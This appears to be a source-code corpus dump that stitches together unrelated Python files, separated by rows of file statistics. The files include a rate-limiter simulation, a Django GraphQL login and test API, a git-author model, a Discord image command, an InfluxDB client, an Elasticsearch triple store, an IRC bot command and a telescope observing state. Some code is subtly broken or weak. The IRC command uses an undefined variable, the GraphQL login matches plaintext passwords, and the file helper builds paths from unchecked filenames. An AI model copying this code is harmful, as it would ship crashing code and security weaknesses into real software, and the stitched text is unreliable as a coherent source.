next_request = self.workload_model.next_request(self.time, request.priority)
if next_request is not None and next_request.time < self.duration:
heapq.heappush(self.tasks, Task(next_request.time, lambda: self.receive_request(next_request)))
else:
self.request_scheduled[request.priority] = False
def process_requests(self, last_time):
elapsed = self.time - last_time
for limiter in self.priority_limiters.values():
limiter.update_limit(Limiter.UpdateLimitParams(self.time, elapsed))
current_started = 0
started = {p:0 for p in self.workload_model.priorities()}
min_priority = Priority.SYSTEM
last_batch = 0
while len(self.request_queue) > 0:
request = self.request_queue[0]
if not self.priority_limiters[request.priority].can_start(Limiter.CanStartParams(self.time, current_started, request.count)):
break
min_priority = request.priority
last_batch = request.count
if self.workload_model.request_completed(request) and not self.request_scheduled[request.priority]:
next_request = self.workload_model.next_request(self.time, request.priority)
assert next_request is not None
heapq.heappush(self.tasks, Task(next_request.time, lambda next_request=next_request: self.receive_request(next_request)))
self.request_scheduled[request.priority] = True
current_started += request.count
started[request.priority] += request.count
heapq.heappop(self.request_queue)
self.results.started[request.priority][int(self.time)] += request.count
self.results.latencies[request.priority][int(self.time)].append(self.time-request.time)
if len(self.request_queue) == 0:
min_priority = Priority.BATCH
for priority, limiter in self.priority_limiters.items():
started_at_priority = sum([v for p,v in started.items() if p <= priority])
limiter.update_budget(Limiter.UpdateBudgetParams(self.time, current_started, started_at_priority, min_priority, last_batch, len(self.request_queue) == 0 or self.request_queue[0].priority > priority, elapsed))
for priority in self.workload_model.priorities():
self.results.unprocessed_queue_sizes[priority][int(self.time)].append(self.workload_model.workload_models[priority].outstanding)
current_time = self.time
delay = 0.001
heapq.heappush(self.tasks, Task(self.time + delay, lambda: self.process_requests(current_time)))
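# Illustrative driver (a sketch, not part of the original script): the
# ratekeeper and workload model classes named below are assumed to be defined
# earlier in this file alongside Task and Priority.
# if __name__ == '__main__':
#     ratekeeper = RatekeeperModel()
#     workload = WorkloadModel()
#     proxy = ProxyModel(60, ratekeeper, workload, SmoothingBudgetLimiter)
#     proxy.run()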
| 43.551622 | 260 | 0.684503 | 1,904 | 14,764 | 5.085084 | 0.101366 | 0.037182 | 0.03615 | 0.030366 | 0.590167 | 0.511568 | 0.450527 | 0.375129 | 0.363561 | 0.3176 | 0 | 0.006539 | 0.212815 | 14,764 | 338 | 261 | 43.680473 | 0.826536 | 0.157004 | 0 | 0.325991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008811 | 1 | 0.189427 | false | 0.017621 | 0.022026 | 0.030837 | 0.30837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ca773ac0f073470bf450494c33f4940782589f8 | 4,857 | py | Python | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | """
All Query definitions for GraphQL.
"""
import logging
import datetime
import graphene
from graphql import GraphQLError
from .types import (
AccountTestType, TestCaseType, StartTestType
)
from ..models import (
AccountTest, TestCase, Test
)
logger = logging.getLogger(__name__)
class RootQuery(graphene.AbstractType, graphene.ObjectType):
login = graphene.Field(
AccountTestType,
email=graphene.String(required=True),
password=graphene.String(required=True)
) # Authorization.
user = graphene.Field(
AccountTestType
) # Get account info.
test = graphene.Field(
TestCaseType,
id=graphene.Int(required=True)
) # Get the test for the user.
start_test = graphene.Field(
StartTestType,
id=graphene.Int(required=True)
) # Start testing.
end_test = graphene.Field(
TestCaseType,
id=graphene.Int(required=True)
) # Finish testing.
def resolve_login(self, args, context, info):
"""
Авторизация пользователя.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Аккаунт или None
:rtype: AccountTest
"""
email, passwd = args.get("email"), args.get("password")
accounts = AccountTest.objects.filter(email=email, password=passwd)
if not accounts.exists():
raise GraphQLError("Логин или пароль неверные.")
account = accounts.first()
context.session["testing_auth_token"] = account.get_auth_token()
return account
def resolve_user(self, args, context, info):
"""
Возвращает авторизованный аккаунт для тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Аккаунт или None
:rtype: AccountTest
"""
if hasattr(context, "account_test"):
return context.account_test
raise GraphQLError("Требуется авторизация.")
def resolve_test(self, args, context, info):
"""
Возвращает информацию по тесту, перед началом тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Сам тест или None
:rtype: TestCase
"""
if not hasattr(context, "account_test"):
raise GraphQLError("Требуется авторизация.")
try:
return context.account_test.tests.get(
pk=args.get("id", None)
)
except TestCase.DoesNotExist as e:
logger.error(e)
raise GraphQLError("Такого теста не существует.")
except TestCase.MultipleObjectsReturned as e:
logger.error(e)
raise GraphQLError("Произошла неизвестная ошибка.")
def resolve_start_test(self, args, context, info):
"""
Возвращает информацию по тесту, перед началом тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Сам тест или None
:rtype: TestCase
"""
if not hasattr(context, "account_test"):
raise GraphQLError("Требуется авторизация.")
try:
test_case = context.account_test.tests.get(
pk=args.get("id", None)
) # Fetched the test case
test = Test.objects.filter(test_case_id=args.get("id", None), account=context.account_test).first()
if test is None:
# Guard against .first() returning None, which would otherwise crash below.
raise GraphQLError("No such test exists.")
if any([test.date_start, test.date_end, test.answers]):
# The user has already taken it.
raise GraphQLError("You have already started the test with id `{}`.".format(args.get("id", "")))
test.date_start = datetime.datetime.now()
test.save()
return test_case
except TestCase.DoesNotExist as e:
logger.error(e)
raise GraphQLError("Такого теста не существует.")
except TestCase.MultipleObjectsReturned as e:
logger.error(e)
raise GraphQLError("Произошла неизвестная ошибка.")
# TODO: Still need to write the test validation and an endpoint for the test result(s).
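# Example client query against this schema (illustrative; the selected fields
# on AccountTestType are assumptions):
# query {
#   login(email: "user@example.com", password: "secret") {
#     email
#   }
# }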
| 30.54717 | 111 | 0.624665 | 507 | 4,857 | 5.927022 | 0.284024 | 0.050915 | 0.04193 | 0.025291 | 0.584692 | 0.566722 | 0.566722 | 0.548419 | 0.548419 | 0.512479 | 0 | 0 | 0.282067 | 4,857 | 158 | 112 | 30.740506 | 0.861772 | 0.306774 | 0 | 0.342105 | 0 | 0 | 0.103368 | 0 | 0 | 0 | 0 | 0.006329 | 0 | 1 | 0.052632 | false | 0.039474 | 0.078947 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cab50c58e4f3c4b31b27fba5d18763090e63b20 | 4,547 | py | Python | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | 1 | 2021-08-24T03:41:34.000Z | 2021-08-24T03:41:34.000Z | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | null | null | null | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2019 SourceOptics Project Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
from django.db import models
from django.db.models import Sum
from . commit import Commit
from . file import File
from . repository import Repository
class Author(models.Model):
email = models.CharField(db_index=True, max_length=512, unique=True, blank=False, null=True)
display_name = models.CharField(db_index=True, max_length=512, unique=False, blank=True, null=True)
alias_for = models.ForeignKey('self', blank=True, null=True, related_name='alias_of', on_delete=models.SET_NULL)
def get_display_name(self):
if self.display_name:
return self.display_name
return self.email
def __str__(self):
return f"Author: {self.display_name} <{self.email}>"
@functools.lru_cache(maxsize=128, typed=False)
def earliest_commit_date(self, repo):
return Commit.objects.filter(author=self, repo=repo).earliest("commit_date").commit_date
@functools.lru_cache(maxsize=128, typed=False)
def latest_commit_date(self, repo):
return Commit.objects.filter(author=self, repo=repo).latest("commit_date").commit_date
@classmethod
def cache_clear(cls):
cls.earliest_commit_date.cache_clear()
cls.latest_commit_date.cache_clear()
cls.authors.cache_clear()
cls.author_count.cache_clear()
def statistics(self, repo, start=None, end=None, interval=None):
from . statistic import Statistic
# FIXME: we should be using annotate in most places, move away from this?
assert start is not None
assert end is not None
assert interval is not None
stat = Statistic.objects.filter(
repo=repo,
author=self,
interval=interval,
start_date__range=(start, end)
).aggregate(
lines_added=Sum('lines_added'),
lines_changed=Sum('lines_changed'),
lines_removed=Sum('lines_removed'),
commit_total=Sum('commit_total'),
moves=Sum('moves'),
edits=Sum('edits'),
creates=Sum('creates')
)
return stat
@functools.lru_cache(maxsize=128, typed=False)
def repos(self, start=None, end=None):
if start is not None:
qs = Commit.objects.filter(
author=self,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
author=self
)
repo_ids = qs.values_list('repo', flat=True).distinct('repo')
return Repository.objects.filter(pk__in=repo_ids)
@classmethod
@functools.lru_cache(maxsize=128, typed=False)
def authors(cls, repo, start=None, end=None):
assert repo is not None
qs = None
if start is not None:
if isinstance(repo, str):
qs = Commit.objects.filter(
author__isnull=False,
repo__name=repo,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
author__isnull=False,
repo=repo,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
repo=repo,
author__isnull=False,
)
author_ids = qs.values_list('author', flat=True).distinct('author')
return Author.objects.filter(pk__in=author_ids)
@classmethod
@functools.lru_cache(maxsize=128, typed=False)
def author_count(cls, repo, start=None, end=None):
return cls.authors(repo, start=start, end=end).count()
@functools.lru_cache(maxsize=128, typed=False)
def files_changed(self, repo):
return File.objects.select_related('file_changes', 'commit').filter(
repo=repo,
file_changes__commit__author=self,
).distinct('path').count()
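# Illustrative usage (a sketch; the repo object, date range, and interval code
# are assumptions, not part of this module):
# author = Author.objects.get(email='dev@example.com')
# stats = author.statistics(repo, start=start_date, end=end_date, interval='DY')
# repos_touched = author.repos(start=start_date, end=end_date)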
| 36.087302 | 116 | 0.632065 | 566 | 4,547 | 4.918728 | 0.284452 | 0.039511 | 0.047773 | 0.051724 | 0.350934 | 0.295977 | 0.251078 | 0.251078 | 0.173132 | 0.141523 | 0 | 0.01085 | 0.270288 | 4,547 | 125 | 117 | 36.376 | 0.82821 | 0.142072 | 0 | 0.322917 | 0 | 0 | 0.047362 | 0 | 0 | 0 | 0 | 0.008 | 0.041667 | 1 | 0.104167 | false | 0 | 0.072917 | 0.052083 | 0.322917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cab8d3a411dd7c4773e6e7308b7a8e97ceb31d6 | 2,820 | py | Python | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | import random
import requests
from mitsbot_globals import bingAPIKey, animals, animalFilter, addEventListener
from discordHelpers import sendImageEmbed
async def getImage(searchTerm, imageType):
randomPage = random.randint(0, 200)
searchURL = "https://api.bing.microsoft.com/v7.0/images/search"
headers = {"Ocp-Apim-Subscription-Key" : bingAPIKey}
params = {"q": searchTerm, "safeSearch": "Strict", "imageType": imageType, "count": "1", "offset": str(randomPage)}
try:
response = requests.get(searchURL, headers=headers, params=params)
data = response.json()
url = data["value"][0]["contentUrl"]
return url
except Exception:
# Network error or unexpected API payload; callers treat None as failure.
return None
async def sendAnimal(message):
try:
command = message.content.lower()[2:]
if command == "an" or command == "animal":
animal = animals[random.randint(0, len(animals) - 1)]
imageURL = await getImage(animal + animalFilter, "Photo")
await sendImageEmbed(message, "Here is a " + animal + ".", imageURL)
else:
for i in animals:
# if the incoming animal matches one in the animals list
if i.startswith(command[command.find(" ") + 1:]):
imageURL = await getImage(i + animalFilter, "Photo")
await sendImageEmbed(message, "Here is a " + i + ".", imageURL)
return
await message.channel.send("Sorry, that animal cannot be found.", delete_after=10)
except Exception as e:
print(e)
await message.channel.send("Sorry, the image retrieval failed.", delete_after=10)
async def sendAnimalGif(message):
try:
command = message.content.lower()[2:]
if command == "ang" or command == "animalgif":
animal = animals[random.randint(0, len(animals) - 1)]
imageURL = await getImage(animal + animalFilter, "AnimatedGif")
await sendImageEmbed(message, "Here is a " + animal + ".", imageURL)
else:
for i in animals:
# if the incoming animal matches one in the animals list
if i.startswith(command[command.find(" ") + 1:]):
imageURL = await getImage(i + animalFilter, "AnimatedGif")
await sendImageEmbed(message, "Here is a " + i + ".", imageURL)
return
await message.channel.send("Sorry, that animal cannot be found.", delete_after=10)
except Exception as e:
print(e)
await message.channel.send("Sorry, the image retrieval failed.", delete_after=10)
# add event listeners for discord commands
addEventListener("an", sendAnimal)
addEventListener("animal", sendAnimal)
addEventListener("ang", sendAnimalGif)
addEventListener("animalgif", sendAnimalGif)
| 42.089552 | 120 | 0.620567 | 305 | 2,820 | 5.721311 | 0.35082 | 0.02063 | 0.032092 | 0.05043 | 0.589112 | 0.589112 | 0.589112 | 0.589112 | 0.570774 | 0.518052 | 0 | 0.011594 | 0.265957 | 2,820 | 66 | 121 | 42.727273 | 0.831401 | 0.053191 | 0 | 0.518519 | 0 | 0 | 0.143661 | 0.009377 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.148148 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cae496e1b2f412f1fae88cb2da5c9ceee2ccec9 | 2,020 | py | Python | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | import json
import influxdb_client
from influxdb_client.client.write_api import SYNCHRONOUS
class QueryData():
CONFIG_FILE = "./config.json"
def __init__(self):
self.readConfigFile()
self.createInfluxClient()
def readConfigFile(self):
try:
with open(self.CONFIG_FILE, 'r') as fp:
config_data = json.load(fp)
self.token = config_data["token"]
self.org = config_data["org"]
self.bucket = config_data["bucket"]
self.url = config_data["url"]
except Exception as file_error:
print(f'Error: {file_error}')
exit(-1)
def createInfluxClient(self):
try:
print("Creating client..")
self.client = influxdb_client.InfluxDBClient(
url=self.url,
token=self.token,
org=self.org
)
self.query_api = self.client.query_api()
except Exception as influx_error:
print(f'Error: {influx_error}')
exit(-1)
def queryData(self, query):
print("Querying data")
result = self.query_api.query(org=self.org, query=query)
results = []
for table in result:
for record in table.records:
results.append((record.get_field(), record.get_value()))
print(results)
def queryStream(self, query):
print("Querying data stream")
records = self.query_api.query_stream(org=self.org, query=query)
for record in records:
print(record.get_field(), record.get_value())
if __name__ == "__main__":
q = QueryData()
query = f'from(bucket:"{q.bucket}")\
|> range(start: -5m)\
|> filter(fn:(r) => r._measurement == "my_measurement")\
|> filter(fn: (r) => r.location == "Prague")\
|> filter(fn:(r) => r._field == "temperature" )'
q.queryData(query=query)
# q.queryStream(query=query)
print("\nDone.") | 33.114754 | 72 | 0.562871 | 225 | 2,020 | 4.88 | 0.306667 | 0.045537 | 0.027322 | 0.027322 | 0.134791 | 0.051002 | 0 | 0 | 0 | 0 | 0 | 0.002147 | 0.308416 | 2,020 | 61 | 73 | 33.114754 | 0.783822 | 0.012871 | 0 | 0.075472 | 0 | 0 | 0.088811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.056604 | 0 | 0.188679 | 0.150943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf022c3f2864b15bee88ecc375d06b4492e187 | 1,839 | py | Python | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | null | null | null | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | null | null | null | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | 1 | 2018-07-25T10:01:07.000Z | 2018-07-25T10:01:07.000Z | import os
import shutil
def get_instance(configuration):
return Filesystem(configuration)
class Filesystem:
def __init__(self, configuration):
if "filesystem" not in configuration:
raise KeyError("Filesystem not found in configuration")
if "location" not in configuration['filesystem']:
raise KeyError("filesystem.location is not configured")
self.base = configuration['filesystem']['location']
def get_dir(self, uuid):
return self.base + "/" + str(uuid) + "/"
def add(self, uuid, filepath):
directory = self.get_dir(uuid)
if not os.path.exists(directory):
os.makedirs(directory)
shutil.copy2(filepath, directory)
def save(self, uuid, file, filename):
directory = self.get_dir(uuid)
if not os.path.exists(directory):
os.makedirs(directory)
target = os.path.join(directory, filename)
file.save(target)
def get(self, uuid, file=None, basename_only=False):
result = []
directory = self.get_dir(uuid)
for (dirpath, dirnames, filenames) in os.walk(directory):
result = filenames
break # We only want the top level dir
if basename_only:
prefix = ""
else:
prefix = directory
if file is not None:
if file in result:
return prefix + file
return None
return [prefix + r for r in result]
def remove(self, uuid, file):
full = self.get_dir(uuid) + file
try:
os.remove(full)
except OSError:
return False
return True
def remove_dir(self, uuid):
directory = self.get_dir(uuid)
try:
shutil.rmtree(directory)
except OSError:
pass
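# Illustrative usage (a sketch; the configuration dict and uuid value are
# assumptions):
# fs = get_instance({"filesystem": {"location": "/var/lib/mdms"}})
# fs.add(uuid, "/tmp/report.pdf")
# print(fs.get(uuid, basename_only=True))  # -> ['report.pdf']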
| 28.734375 | 67 | 0.585644 | 208 | 1,839 | 5.110577 | 0.307692 | 0.033866 | 0.047037 | 0.065851 | 0.171214 | 0.12794 | 0.12794 | 0.12794 | 0.12794 | 0.12794 | 0 | 0.000803 | 0.323002 | 1,839 | 63 | 68 | 29.190476 | 0.853012 | 0.016313 | 0 | 0.230769 | 0 | 0 | 0.067515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0.019231 | 0.038462 | 0.038462 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf05395c79fc2af4c7564cdcfd716e7e6bd154 | 2,049 | py | Python | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | 2 | 2018-11-14T05:29:52.000Z | 2019-05-21T03:42:28.000Z | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | null | null | null | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | 2 | 2019-08-08T00:41:26.000Z | 2020-03-17T18:12:31.000Z | from omniscient.base.constants import *
from omniscient.base.logger import Log
from elasticsearch import Elasticsearch, helpers
import json
logger = Log("info")
class ESTripleStore(object):
"""
Triple store backend.
"""
def __init__(self, host, port, settings):
self.es = Elasticsearch(['{}:{}'.format(host, port)])
self.settings = settings
self.index_settings = json.load(open(settings[INDEX_SETTINGS]))
self.actions = []
self.triple_number = 1
def clear_index(self):
logger.info("removing indices {} ...".format(self.settings[INDEX_NAME]))
self.es.indices.delete(index=self.settings[INDEX_NAME], ignore=[400, 404])
def create_index(self):
logger.info("create indices {}".format(self.settings[INDEX_NAME]))
self.es.indices.create(index=self.settings[INDEX_NAME], body=self.index_settings[SETTING])
self.es.indices.put_mapping(index=self.settings[INDEX_NAME], body=self.index_settings[MAPPING], include_type_name=False)
def add_triple(self, subj, pred, obj):
self.actions.append({
"_op_type": "index",
"_index": self.settings[INDEX_NAME],
"_source": {
"subject": {
"text": subj
},
"predicate": {
"text": pred
},
"object": {
"text": obj
}
}
})
size = len(self.actions)
if size >= self.settings[TRIPLES_TO_BULK]:
logger.info("Execute bulk load - {} triples. Total: {}".format(
size, self.triple_number))
helpers.bulk(self.es, self.actions)
self.actions = []
self.triple_number += 1
def close(self):
helpers.bulk(self.es, self.actions)
self.actions = []
logger.info("Execute bulk load - {} triples. Total: {}".format(
self.settings[TRIPLES_TO_BULK], self.triple_number))
def search_node(self, node_uri):
query = {
"query": {
"match": {
"subject.text": node_uri
}
},
"size": 5
}
print(query)
return self.es.search(index=self.settings[INDEX_NAME], body=query)
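# Illustrative usage (a sketch; the settings keys come from
# omniscient.base.constants and the values below are assumptions):
# settings = {INDEX_NAME: 'triples', INDEX_SETTINGS: 'index.json', TRIPLES_TO_BULK: 100}
# store = ESTripleStore('localhost', 9200, settings)
# store.clear_index()
# store.create_index()
# store.add_triple('<Albert_Einstein>', '<bornIn>', '<Ulm>')
# store.close()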
| 28.068493 | 124 | 0.630063 | 246 | 2,049 | 5.101626 | 0.304878 | 0.095618 | 0.094821 | 0.117131 | 0.451793 | 0.410359 | 0.386454 | 0.345817 | 0.283665 | 0.133865 | 0 | 0.007514 | 0.220595 | 2,049 | 72 | 125 | 28.458333 | 0.778334 | 0.010249 | 0 | 0.155172 | 0 | 0 | 0.107799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.206897 | 0.017241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf406a1ea001c308fc80f8ba7e257e04a231a5 | 1,223 | py | Python | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | from CommandTemplate import CommandTemplate
import GlobalStore
from IrcMessage import IrcMessage
class Command(CommandTemplate):
triggers = ['joinserver']
helptext = "Makes me join a server, if it's preconfigured."
adminOnly = True
def execute(self, message):
"""
:type message: IrcMessage
"""
replytext = u""
if message.messagePartsLength == 0:
replytext = u"Please provide a server name to join"
#Assume a non-preconfigured server is entered, in a JSON way, so 'server: irc.server.com'
elif message.messagePartsLength > 1 or ":" in message.message:
replytext = u"Oh, being fancy, are we? This'll be implemented in a bit, but good on you for trying!"
#One word was provided, assume it's a preconfigured server folder
elif message.messagePartsLength == 1:
success = GlobalStore.bothandler.startBotfactory(message.message)
if success:
replytext = u"Successfully created new bot instance for server '{}'".format(message.message)
else:
replytext = u"Something went wrong with trying to create a bot instance for server '{}'. Most likely a typo in the name, or maybe no settings exist yet for that server".format(msgWithoutFirstWord)
message.bot.say(message.source, replytext) | 42.172414 | 200 | 0.745707 | 167 | 1,223 | 5.461078 | 0.57485 | 0.054825 | 0.063596 | 0.065789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002947 | 0.167621 | 1,223 | 29 | 201 | 42.172414 | 0.892927 | 0.145544 | 0 | 0 | 0 | 0.1 | 0.371733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb19cdf8855026084363e3183821b88d0d91181 | 1,361 | py | Python | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | from multiprocessing import Process
from panoptes.utils import error
def on_enter(event_data):
"""Take an observation image.
This state is responsible for taking the actual observation image.
"""
pocs = event_data.model
current_obs = pocs.observatory.current_observation
pocs.say(f"🔭🔭 I'm observing {current_obs.field.field_name}! 🔭🔭")
pocs.next_state = 'parking'
try:
# Do the observing, once per exptime (usually only one unless a compound observation).
for _ in current_obs.exptimes:
pocs.observatory.observe(blocking=True)
pocs.say(f"Finished observing! I'll start processing that in the background.")
# Do processing in background.
process_proc = Process(target=pocs.observatory.process_observation)
process_proc.start()
pocs.logger.debug(f'Processing for {current_obs} started on {process_proc.pid=}')
except (error.Timeout, error.CameraNotFound):
pocs.logger.warning("Timeout waiting for images. Something wrong with cameras, parking.")
except Exception as e:
pocs.logger.warning(f"Problem with imaging: {e!r}")
pocs.say("Hmm, I'm not sure what happened with that exposure.")
else:
pocs.logger.debug('Finished with observing, going to analyze')
pocs.next_state = 'analyzing'
| 40.029412 | 97 | 0.68626 | 176 | 1,361 | 5.238636 | 0.534091 | 0.043384 | 0.017354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221161 | 1,361 | 33 | 98 | 41.242424 | 0.866038 | 0.155033 | 0 | 0 | 0 | 0 | 0.331278 | 0.027313 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb3b866b240fca4b686d2dbdbde5c913b7e9e68 | 4,183 | py | Python | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | null | null | null | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | null | null | null | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | 1 | 2020-12-23T23:27:30.000Z | 2020-12-23T23:27:30.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 23 00:54:08 2019
@author: nelson
"""
import tensorflow_datasets.public_api as tfds
import os
import tensorflow as tf
classes = [{'name': 'road' , 'color': [128, 64,128]},
{'name': 'sidewalk' , 'color': [244, 35,232]},
{'name': 'building' , 'color': [ 70, 70, 70]},
{'name': 'wall' , 'color': [102,102,156]},
{'name': 'fence' , 'color': [190,153,153]},
